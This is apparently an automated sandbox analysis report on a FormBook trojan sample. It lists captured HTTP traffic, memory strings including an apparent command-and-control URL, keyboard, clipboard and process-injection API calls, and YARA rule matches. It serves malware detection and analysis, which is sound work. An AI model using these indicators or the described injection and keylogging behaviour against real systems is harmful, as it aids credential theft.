Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 03:08:33 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 03:08:35 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 03:08:38 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 03:09:50 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Sat, 11 Jan 2025 03:10:03 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Sat, 11 Jan 2025 03:10:06 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>

Source: zERAQEwgaCWL.exe, 00000008.00000002.3859655082.0000000004EBD000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.empowermedeco.com
Source: zERAQEwgaCWL.exe, 00000008.00000002.3859655082.0000000004EBD000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.empowermedeco.com/fo8o/
Source: netbtugc.exe, 00000004.00000003.1751700157.0000000007DB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: netbtugc.exe, 00000004.00000003.1751700157.0000000007DB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: netbtugc.exe, 00000004.00000003.1751700157.0000000007DB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: netbtugc.exe, 00000004.00000003.1751700157.0000000007DB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: netbtugc.exe, 00000004.00000002.3859184553.0000000004952000.00000004.10000000.00040000.00000000.sdmp, zERAQEwgaCWL.exe, 00000008.00000002.3857301364.00000000038C2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
Source: netbtugc.exe, 00000004.00000002.3859184553.0000000004952000.00000004.10000000.00040000.00000000.sdmp, zERAQEwgaCWL.exe, 00000008.00000002.3857301364.00000000038C2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
Source: netbtugc.exe, 00000004.00000003.1751700157.0000000007DB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: netbtugc.exe, 00000004.00000003.1751700157.0000000007DB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: netbtugc.exe, 00000004.00000003.1751700157.0000000007DB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: netbtugc.exe, 00000004.00000002.3849311944.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: netbtugc.exe, 00000004.00000002.3849311944.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: netbtugc.exe, 00000004.00000003.1747859503.0000000007CE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: netbtugc.exe, 00000004.00000002.3849311944.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: netbtugc.exe, 00000004.00000002.3849311944.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: netbtugc.exe, 00000004.00000002.3849311944.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: netbtugc.exe, 00000004.00000002.3849311944.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: netbtugc.exe, 00000004.00000003.1751700157.0000000007DB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: netbtugc.exe, 00000004.00000002.3859184553.0000000004F9A000.00000004.10000000.00040000.00000000.sdmp, zERAQEwgaCWL.exe, 00000008.00000002.3857301364.0000000003F0A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.empowermedeco.com/fo8o/?7Fp=mxnR
Source: netbtugc.exe, 00000004.00000003.1751700157.0000000007DB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: netbtugc.exe, 00000004.00000002.3861080455.00000000062C0000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3859184553.000000000462E000.00000004.10000000.00040000.00000000.sdmp, zERAQEwgaCWL.exe, 00000008.00000002.3857301364.000000000359E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
Source: zERAQEwgaCWL.exe, 00000008.00000002.3857301364.000000000359E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.sedo.com/services/parking.php3

Source: C:\Users\user\Desktop\WBI835q8qr.exe

Code function: 0_2_00B94164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00B94164

Source: C:\Users\user\Desktop\WBI835q8qr.exe

Code function: 0_2_00B94164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00B94164

Source: C:\Users\user\Desktop\WBI835q8qr.exe

Code function: 0_2_00B93F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00B93F66

Source: C:\Users\user\Desktop\WBI835q8qr.exe

Code function: 0_2_00B8001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00B8001C

Source: C:\Users\user\Desktop\WBI835q8qr.exe

Code function: 0_2_00BACABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00BACABC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3856343827.0000000003090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3848509513.0000000000CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1567281464.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3855901361.0000000003240000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3859655082.0000000004E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3856117631.0000000003050000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1568187338.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1567707213.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3856343827.0000000003090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3848509513.0000000000CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1567281464.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.3855901361.0000000003240000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.3859655082.0000000004E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3856117631.0000000003050000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1568187338.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1567707213.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00B23B3A
Source: WBI835q8qr.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: WBI835q8qr.exe, 00000000.00000000.1402937645.0000000000BD4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_f86eb5e7-6
Source: WBI835q8qr.exe, 00000000.00000000.1402937645.0000000000BD4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_9c09d748-8
Source: WBI835q8qr.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_55191d79-b
Source: WBI835q8qr.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_e3074336-7

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042B363 NtClose,	2_2_0042B363
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772B60 NtClose,LdrInitializeThunk,	2_2_03772B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03772DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772C70 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_03772C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037735C0 NtCreateMutant,LdrInitializeThunk,	2_2_037735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03774340 NtSetContextThread,	2_2_03774340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03774650 NtSuspendThread,	2_2_03774650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772BF0 NtAllocateVirtualMemory,	2_2_03772BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772BE0 NtQueryValueKey,	2_2_03772BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772BA0 NtEnumerateValueKey,	2_2_03772BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772B80 NtQueryInformationFile,	2_2_03772B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772AF0 NtWriteFile,	2_2_03772AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772AD0 NtReadFile,	2_2_03772AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772AB0 NtWaitForSingleObject,	2_2_03772AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772F60 NtCreateProcessEx,	2_2_03772F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772F30 NtCreateSection,	2_2_03772F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772FE0 NtCreateFile,	2_2_03772FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772FB0 NtResumeThread,	2_2_03772FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772FA0 NtQuerySection,	2_2_03772FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772F90 NtProtectVirtualMemory,	2_2_03772F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772E30 NtWriteVirtualMemory,	2_2_03772E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772EE0 NtQueueApcThread,	2_2_03772EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772EA0 NtAdjustPrivilegesToken,	2_2_03772EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772E80 NtReadVirtualMemory,	2_2_03772E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772D30 NtUnmapViewOfSection,	2_2_03772D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772D10 NtMapViewOfSection,	2_2_03772D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772D00 NtSetInformationFile,	2_2_03772D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772DD0 NtDelayExecution,	2_2_03772DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772DB0 NtEnumerateKey,	2_2_03772DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772C60 NtCreateKey,	2_2_03772C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772C00 NtQueryInformationProcess,	2_2_03772C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772CF0 NtOpenProcess,	2_2_03772CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772CC0 NtQueryVirtualMemory,	2_2_03772CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772CA0 NtQueryInformationToken,	2_2_03772CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03773010 NtOpenDirectoryObject,	2_2_03773010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03773090 NtSetValueKey,	2_2_03773090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037739B0 NtGetContextThread,	2_2_037739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03773D70 NtOpenThread,	2_2_03773D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03773D10 NtOpenProcessToken,	2_2_03773D10
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034B4340 NtSetContextThread,LdrInitializeThunk,	4_2_034B4340
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034B4650 NtSuspendThread,LdrInitializeThunk,	4_2_034B4650
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034B2B60 NtClose,LdrInitializeThunk,	4_2_034B2B60
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034B2BE0 NtQueryValueKey,LdrInitializeThunk,	4_2_034B2BE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034B2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	4_2_034B2BF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034B2BA0 NtEnumerateValueKey,LdrInitializeThunk,	4_2_034B2BA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034B2AD0 NtReadFile,LdrInitializeThunk,	4_2_034B2AD0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034B2AF0 NtWriteFile,LdrInitializeThunk,	4_2_034B2AF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034B2F30 NtCreateSection,LdrInitializeThunk,	4_2_034B2F30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034B2FE0 NtCreateFile,LdrInitializeThunk,	4_2_034B2FE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034B2FB0 NtResumeThread,LdrInitializeThunk,	4_2_034B2FB0
